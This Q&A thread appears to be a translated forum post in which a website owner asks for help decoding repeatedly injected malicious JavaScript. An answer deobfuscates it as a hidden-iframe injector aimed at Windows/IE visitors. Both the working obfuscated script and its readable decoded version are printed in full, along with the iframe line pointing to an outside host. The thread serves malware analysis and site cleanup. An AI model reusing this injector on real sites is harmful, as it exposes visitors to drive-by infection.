
我的网站已经插入了大约 4 次这些脚本。我已经更改了太多次 ftp 密码,但它仍然能够插入到我的网页中。请帮我解码这两个脚本。也许我可以找到有关此恶意软件脚本的更多详细信息。

<script>/* Analyst notes (review): "MaZsKgZUgCCRdH" is an index table that fixes the read order of the byte table "a" below; the decoded listing in the answer calls these two arrays "payload" and "key" respectively */var MaZsKgZUgCCRdH = ["98","73","79","45","64","92","91","66","35","70","82","4","65","80","17","76","3","74","41","69","1","40","77","52","54","42","9","22","88","0","30","59","26","94","99","85","16","86","55","34","81","67","56","97","36","78","63","72","38","43","62","7","33","96","31","25","90","19","48","6","14","87","28","13","23","24","68","39","61","49","37","71","10","12","83","44","29","32","84","50","18","100","47","15","51","20","53","11","93","58","60","2","95","8","27","75","46","21","5","89","57"];/* "a": XOR-masked bytes of the injected markup; decoder 1 reads them in index-table order and XORs each with 58 */var a = ["83","78","4","74","7","87","29","29","21","20","29","93","11","29","14","7","87","78","83","82","72","91","78","26","82","94","83","83","12","29","94","83","26","26","74","73","20","78","5","83","95","21","95","11","2","72","72","84","7","82","86","24","84","83","95","73","94","4","78","64","24","93","9","73","91","29","26","95","95","21","72","7","93","83","0","92","78","95","87","92","82","95","89","15","91","85","21","9","91","95","78","95","87","82","20","6","77","85","6","89","93"];/* decoder 1: for each i, parseInt(table[index[i]]) ^ 58, concatenated into a string */function wCBFqxiBsScuHg(VCAscVoJW, IU){var CgoBQGzvdo='';for(var HYDZhkaoy=0;HYDZhkaoy< VCAscVoJW.length;HYDZhkaoy++)CgoBQGzvdo+=String.fromCharCode(parseInt(VCAscVoJW[IU[HYDZhkaoy]])^58);return CgoBQGzvdo;}/* decoder 2: each hex string ^ a per-call key; used to hide DOM property names (document, createElement, innerHTML, ... — see the decoded listing in the answer) */function DUJiJVvMZAgBr(xZwtmwHJjcOg, ePUFHpNSM){var U='';for(var yBIrf=0;yBIrf< xZwtmwHJjcOg.length;yBIrf++)U += String.fromCharCode(parseInt(xZwtmwHJjcOg[yBIrf], 16)^ePUFHpNSM); return U;}/* entry IIFE over window; PGMRLirigv is the handler, guarded by the BcRTDdLpRbS flag so it runs at most once */(function(TfEh){var PGMRLirigv=function(){if(!TfEh.BcRTDdLpRbS){TfEh.BcRTDdLpRbS=133;var GQdPVJX = ["20","2b","27","31","29","21","2a","30"];var hQxQnSWejILY=DUJiJVvMZAgBr(GQdPVJX, 68);var CQjjfdHLQzuftp = ["7f","6e","79","7d","68","79","59","70","79","71","79","72","68"];var kpCkPGQ=DUJiJVvMZAgBr(CQjjfdHLQzuftp, 28);var DOdnKPRxnUn = ["d3","de","c1"];var m=DUJiJVvMZAgBr(DOdnKPRxnUn, 183);var Hsz = ["90","97","97","9c","8b","b1","ad","b4","b5"];var bBetq=DUJiJVvMZAgBr(Hsz, 249);var el = ["1f","18","15","0","9"];var FsoPN=DUJiJVvMZAgBr(el, 108);var yNkqOiY = 
["fd","f0","ea","e9","f5","f8","e0"];var YPtQveRMcV=DUJiJVvMZAgBr(yNkqOiY, 153);var JjrPjK = ["ed","ec","ed","e6"];var HBchKFWjQp=DUJiJVvMZAgBr(JjrPjK, 131);var ZDHWSZcCzlmCy = ["8e","83","88","95"];var atpwWUCri=DUJiJVvMZAgBr(ZDHWSZcCzlmCy, 236);var knAtUGVSknpiOb = ["7f","6e","6e","7b","70","7a","5d","76","77","72","7a"];var KNMcxqPBoFEzlG=DUJiJVvMZAgBr(knAtUGVSknpiOb, 30);/* gate: the @cc_on conditional-compilation test AND a navigator.platform indexOf test must both hold; two further decoded strings (zudnwEuKBbXyT, VyhuFnerNWUuk) are computed but never used */if(function FRlTmsRJNFmnm(){var iBcOzbBLaJib=true;var yLjfQ=true;var Xbj=/*@cc_on true; @*/false;if(Xbj){iBcOzbBLaJib = true;}else{iBcOzbBLaJib = false;}var VPpowKZVXUiA = ["22","1c","1b"];var GZlLbRNA=DUJiJVvMZAgBr(VPpowKZVXUiA, 117);var FzCjYUCHuJYWjz = ["89","a5","a7"];var zudnwEuKBbXyT=DUJiJVvMZAgBr(FzCjYUCHuJYWjz, 196);var PUEAgmcfh = ["2d","8","f","14","19"];var VyhuFnerNWUuk=DUJiJVvMZAgBr(PUEAgmcfh, 97);var yM = ["af","a0","b7","a8","a6","a0","b5","ae","b3"];var bDiUBGqVfYZ=DUJiJVvMZAgBr(yM, 193);var TYBSKqXbNiGcz = ["4d","4a","40","41","5c","6b","42"];var aMpCvJBLTfhMUw=DUJiJVvMZAgBr(TYBSKqXbNiGcz, 36);var TxHK = ["f5","e9","e4","f1","e3","ea","f7","e8"];var BjNy=DUJiJVvMZAgBr(TxHK, 133);var oGeLQlnBCmKgsn=window[bDiUBGqVfYZ][BjNy][aMpCvJBLTfhMUw](GZlLbRNA) > -1;if(oGeLQlnBCmKgsn){yLjfQ = true;}else{yLjfQ = false;}return (iBcOzbBLaJib&&yLjfQ);}()){/* injection: create an element, set its innerHTML to the decoder-1 output, hide it, append it to document.body */var FnxPXniTOHuU=window[hQxQnSWejILY][kpCkPGQ](m);FnxPXniTOHuU[bBetq]=wCBFqxiBsScuHg(a, MaZsKgZUgCCRdH);FnxPXniTOHuU[FsoPN][YPtQveRMcV]=HBchKFWjQp;window[hQxQnSWejILY][atpwWUCri][KNMcxqPBoFEzlG](FnxPXniTOHuU);}}};var iFyMPH = ["b2","b7","b7","96","a5","b6","bd","a7","9f","ba","a0","a7","b6","bd","b6","a1"];var GkMNyvoZ=DUJiJVvMZAgBr(iFyMPH, 211);var uQO = ["2f","3a","3a","2f","2d","26","b","38","2b","20","3a"];var QuPuK=DUJiJVvMZAgBr(uQO, 78);var MouT = ["87","86"];var KdAtYlyqzy=DUJiJVvMZAgBr(MouT, 232);var VwQKdbWCag = ["7a","79","77","72"];var oicFpeAL=DUJiJVvMZAgBr(VwQKdbWCag, 22);var CPrCjZTfm = ["76","7f","73","65","63"];var hMiVnsaLJ=DUJiJVvMZAgBr(CPrCjZTfm, 16);var gAcCaolkjo = ["67","69","70","77"];var vB=DUJiJVvMZAgBr(gAcCaolkjo, 
5);var MZeG = ["11","13","9","f","19","11","13","a","19"];var SQ=DUJiJVvMZAgBr(MZeG, 124);var HA = ["4b","40","42","5d","4a","4e","4b","56"];var XzF=DUJiJVvMZAgBr(HA, 47);/* hook: prefer the addEventListener name, fall back to the attachEvent name; the handler is bound to five events in both bare and "on"-prefixed form (JNsqiuHb is never declared, so it leaks as a global) */var xAGaJwayje;if(TfEh[GkMNyvoZ])xAGaJwayje=GkMNyvoZ;else xAGaJwayje=QuPuK;var XHF=[oicFpeAL, hMiVnsaLJ, vB, SQ, XzF];for(JNsqiuHb in XHF){TfEh[xAGaJwayje](XHF[JNsqiuHb], PGMRLirigv, false);TfEh[xAGaJwayje]('on' + XHF[JNsqiuHb], PGMRLirigv, false);}})(window)</script>




如果您浏览代码并有条不紊地替换垃圾标识符名称,它会更有意义。大多数代码和标识符只是为了掩盖,而其余的大部分看起来就像浏览器兼容的样板代码,用于执行附加事件等操作。

出于某种原因,它还会检查您是否在 Windows 上;这个检查只决定是否执行注入,并不会改变最终交付的有效负载。

将有效负载部署到页面的部分在这里:

   var newElement = window[_document][_createElement](_div);   // document.createElement('div')
   newElement[_innerHTML] = decodeString(key, payload);        // innerHTML <- decoded markup (the iframe shown below)
   newElement[_style][_display] = _none;                      // style.display = 'none': the element is never visible
   window[_document][_body][_appendChild](newElement);        // document.body.appendChild

有效载荷解密为:

  <iframe src='http://teenee.<OBFUSCATED>.com/speedo.msg?13'
    width='436' height='158' align="right"></iframe>

这是我解码的完整脚本:

<script>
// Naming note: these two names are the reverse of what decodeString(msg, key) suggests.
// `payload` is the index table (the obfuscated MaZsKgZUgCCRdH): it fixes the order in which
// the bytes of `key` are read. It is passed as decodeString's second argument.
var payload = ["98", "73", "79", "45", "64", "92", "91", "66", "35", "70", "82", "4", "65", "80", "17", "76", "3", "74", "41", "69", "1", "40", "77", "52", "54", "42", "9", "22", "88", "0", "30", "59", "26", "94", "99", "85", "16", "86", "55", "34", "81", "67", "56", "97", "36", "78", "63", "72", "38", "43", "62", "7", "33", "96", "31", "25", "90", "19", "48", "6", "14", "87", "28", "13", "23", "24", "68", "39", "61", "49", "37", "71", "10", "12", "83", "44", "29", "32", "84", "50", "18", "100", "47", "15", "51", "20", "53", "11", "93", "58", "60", "2", "95", "8", "27", "75", "46", "21", "5", "89", "57"];
// `key` is the XOR-masked byte table (the obfuscated `a`): each entry, read in `payload`
// order and XORed with 58, yields one character of the injected markup. It is passed as
// decodeString's first argument.
var key = ["83", "78", "4", "74", "7", "87", "29", "29", "21", "20", "29", "93", "11", "29", "14", "7", "87", "78", "83", "82", "72", "91", "78", "26", "82", "94", "83", "83", "12", "29", "94", "83", "26", "26", "74", "73", "20", "78", "5", "83", "95", "21", "95", "11", "2", "72", "72", "84", "7", "82", "86", "24", "84", "83", "95", "73", "94", "4", "78", "64", "24", "93", "9", "73", "91", "29", "26", "95", "95", "21", "72", "7", "93", "83", "0", "92", "78", "95", "87", "92", "82", "95", "89", "15", "91", "85", "21", "9", "91", "95", "78", "95", "87", "82", "20", "6", "77", "85", "6", "89", "93"];

/**
 * Decoder 1 of the sample: reads `msg` in the order given by the index table `key`
 * and XORs each decimal value with 58, yielding the hidden markup as a string.
 *
 * @param {string[]} msg - XOR-masked byte table (decimal strings).
 * @param {Array<string|number>} key - index table; entry i says which element of `msg` is character i.
 * @returns {string} the unmasked text; an out-of-range index parses as NaN and yields ":" (58).
 */
function decodeString(msg, key) {
    var chars = [];
    var total = msg.length;
    for (var pos = 0; pos < total; pos++) {
        // parseInt without a radix is kept on purpose to match the sample's behaviour exactly.
        var masked = parseInt(msg[key[pos]]);
        chars.push(String.fromCharCode(masked ^ 58));
    }
    return chars.join('');
}

/**
 * Decoder 2 of the sample: each entry of `msg` is a hex byte that is XORed with the
 * per-string `key`; used to hide property and event names such as "document" or "div".
 *
 * @param {string[]} msg - hex-encoded byte strings.
 * @param {number} key - XOR key applied to every byte.
 * @returns {string} the decoded text.
 */
function decodeString2(msg, key) {
    var out = '';
    var pos = 0;
    while (pos < msg.length) {
        var value = parseInt(msg[pos], 16);
        out = out + String.fromCharCode(value ^ key);
        pos = pos + 1;
    }
    return out;
}

(function (_window) {
    // Handler bound to several window events below. It runs its body at most once per
    // page (storedData flag) and, if the environment gate passes, appends a hidden
    // element whose innerHTML is the decoder-1 output.
    var executePayload = function () {
        if (!_window.storedData) {
            // Run-once marker; only its truthiness is ever tested.
            _window.storedData = 133;
            // Property names are hidden as hex arrays with a per-string XOR key;
            // the _name variables hold the decoded strings (names chosen by the decoder).
            var crypt1 = ["20", "2b", "27", "31", "29", "21", "2a", "30"];
            var _document = decodeString2(crypt1, 68);
            var crypt2 = ["7f", "6e", "79", "7d", "68", "79", "59", "70", "79", "71", "79", "72", "68"];
            var _createElement = decodeString2(crypt2, 28);
            var crypt3 = ["d3", "de", "c1"];
            var _div = decodeString2(crypt3, 183);
            var crypt4 = ["90", "97", "97", "9c", "8b", "b1", "ad", "b4", "b5"];
            var _innerHTML = decodeString2(crypt4, 249);
            var crypt5 = ["1f", "18", "15", "0", "9"];
            var _style = decodeString2(crypt5, 108);
            var crypt6 = ["fd", "f0", "ea", "e9", "f5", "f8", "e0"];
            var _display = decodeString2(crypt6, 153);
            var crypt7 = ["ed", "ec", "ed", "e6"];
            var _none = decodeString2(crypt7, 131);
            var crypt9 = ["8e", "83", "88", "95"];
            var _body = decodeString2(crypt9, 236);
            var crypt10 = ["7f", "6e", "6e", "7b", "70", "7a", "5d", "76", "77", "72", "7a"];
            var _appendChild = decodeString2(crypt10, 30);
            // Environment gate: both halves must be true for the injection to happen.
            if (function FRlTmsRJNFmnm() {
                var iBcOzbBLaJib = true;
                var yLjfQ = true;
                // JScript conditional compilation: an engine that honours @cc_on evaluates
                // the comment as `true;`, any other engine sees only the literal false.
                var Xbj = /*@cc_on true; @*/ false;
                if (Xbj) {
                    iBcOzbBLaJib = true;
                } else {
                    iBcOzbBLaJib = false;
                }
                var crypt1 = ["22", "1c", "1b"];
                var _Win = decodeString2(crypt1, 117);
                // _Mac and _Linux are decoded but never used.
                var crypt2 = ["89", "a5", "a7"];
                var _Mac = decodeString2(crypt2, 196);
                var crypt3 = ["2d", "8", "f", "14", "19"];
                var _Linux = decodeString2(crypt3, 97);
                var crypt4 = ["af", "a0", "b7", "a8", "a6", "a0", "b5", "ae", "b3"];
                var _navigator = decodeString2(crypt4, 193);
                var crypt5 = ["4d", "4a", "40", "41", "5c", "6b", "42"];
                var _indexOf = decodeString2(crypt5, 36);
                var crypt6 = ["f5", "e9", "e4", "f1", "e3", "ea", "f7", "e8"];
                var _platform = decodeString2(crypt6, 133);
                // window.navigator.platform.indexOf(_Win) > -1  (note: global `window`, not `_window`)
                var browserSaysWindows = window[_navigator][_platform][_indexOf](_Win) > -1;
                if (browserSaysWindows) {
                    yLjfQ = true;
                } else {
                    yLjfQ = false;
                }
                return (iBcOzbBLaJib && yLjfQ);
            }()) {
                // Injection: create the element, set innerHTML to the decoded markup,
                // hide it with display:none, append to document.body.
                var newElement = window[_document][_createElement](_div);
                newElement[_innerHTML] = decodeString(key, payload);
                newElement[_style][_display] = _none;
                window[_document][_body][_appendChild](newElement);
            }
        }
    };
    // Event-binding boilerplate: decode the two registration method names and the
    // event names, then bind executePayload to each of them.
    var crypt1 = ["b2", "b7", "b7", "96", "a5", "b6", "bd", "a7", "9f", "ba", "a0", "a7", "b6", "bd", "b6", "a1"];
    var __addEventListener = decodeString2(crypt1, 211);
    var crypt2 = ["2f", "3a", "3a", "2f", "2d", "26", "b", "38", "2b", "20", "3a"];
    var _attachEvent = decodeString2(crypt2, 78);
    // Decodes to "on" but is never used; the 'on' prefix is spelled out as a literal below.
    var crypt3 = ["87", "86"];
    var KdAtYlyqzy = decodeString2(crypt3, 232);
    var crypt4 = ["7a", "79", "77", "72"];
    var _load = decodeString2(crypt4, 22);
    var crypt5 = ["76", "7f", "73", "65", "63"];
    var focus = decodeString2(crypt5, 16);
    var crypt6 = ["67", "69", "70", "77"];
    var _blur = decodeString2(crypt6, 5);
    // NOTE(review): the obfuscated original (the question's script) has "a" at this
    // position, not "key"; "key" is an artifact of the global rename done while decoding.
    // parseInt("key", 16) is NaN, so as written this yields "mousemo|e" rather than "mousemove".
    var crypt7 = ["11", "13", "9", "f", "19", "11", "13", "key", "19"];
    var _mousemove = decodeString2(crypt7, 124);
    var crypt8 = ["4b", "40", "42", "5d", "4a", "4e", "4b", "56"];
    var _domready = decodeString2(crypt8, 47);
    var _addEventListener;
    // Prefer addEventListener; fall back to attachEvent when it is absent on window.
    if (_window[__addEventListener]) _addEventListener = __addEventListener;
    else _addEventListener = _attachEvent;
    var eventList = [_load, focus, _blur, _mousemove, _domready];
    // for-in over an array; `events` is never declared, so it leaks as a global
    // (the obfuscated original has the same defect).
    for (events in eventList) {
        // Each event is registered twice, bare and 'on'-prefixed — presumably to cover
        // both registration APIs without branching on which one was chosen; verify.
        _window[_addEventListener](eventList[events], executePayload, false);
        _window[_addEventListener]('on' + eventList[events], executePayload, false);
    }
})(window)
</script>

不幸的是,关于它是如何到达这里的,并没有太多线索,只是它在做什么:将 IFrame 注入您的页面,您可能已经知道这一点。

祝你好运!

于 2013-10-10T04:42:59.500 回答